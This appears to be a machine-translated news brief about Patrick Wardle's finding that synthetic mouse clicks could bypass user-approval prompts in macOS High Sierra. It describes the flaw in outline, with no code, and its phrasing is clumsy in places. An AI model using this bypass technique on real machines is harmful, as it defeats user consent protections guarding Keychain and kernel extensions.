According to Threat Post, although Apple tried to fix this vulnerability,But the new finding is that "synthetic clicks" can still work in certain situations.
You can use 'synthetic clicks' in malware to bypass security tips that must be approved by the user before allowing specific activities to occur.
This can easily enable access to sensitive elements (such as Keychain) and load risky activities such as kernel extensions.
Previously, the "synthetic click" question wasSolved in a new security feature called "user-assisted kernel extension loading".
This feature forces the user to manually approve the loading of kernel extensions via the 'Allow' button in the security system interface.
In macOS High Sierra, the operating system has filtered out 'synthetic clicks' that could affect security alerts, making it impossible for attackers to use the technology.
Wardle admitted in his speech,He accidentally discovered a High Sierra flaw while at work, but admitted that there were certain restrictions on bypassing the code.
Mouse clicks are interpreted as two actions in macOS, the ‘down’ and ‘up’ elements that are clicked and released.
However, two consecutive 'synthesis down' events were mistaken by High Sierra for manual legal clicks.
As for the wrong 'up' event, it seems to come from macOS itself and bypass the filtering system.
When copying and pasting "synthetic mouse click code"Wardle made a mistake -- forgot to change the flag value of the "up" event.
As a result, after compiling the code, it was found that it allowed the 'composite click' function - two lines of code to completely break the security mechanism.
Incredibly, this trivial attack has succeeded. I am embarrassed to talk about this mistake, but by contrast, Apple is obviously more embarrassing.
It should be pointed out thatThis vulnerability only affects High Sierra, not the earlier version of macOS.So it may be introduced temporarily.
To be more versatile, Ward suggests that macOS 10.14 Mojave should completely block all ‘synthesis events' – but it may also affect legitimate applications.
[Compiled from:Apple Insider]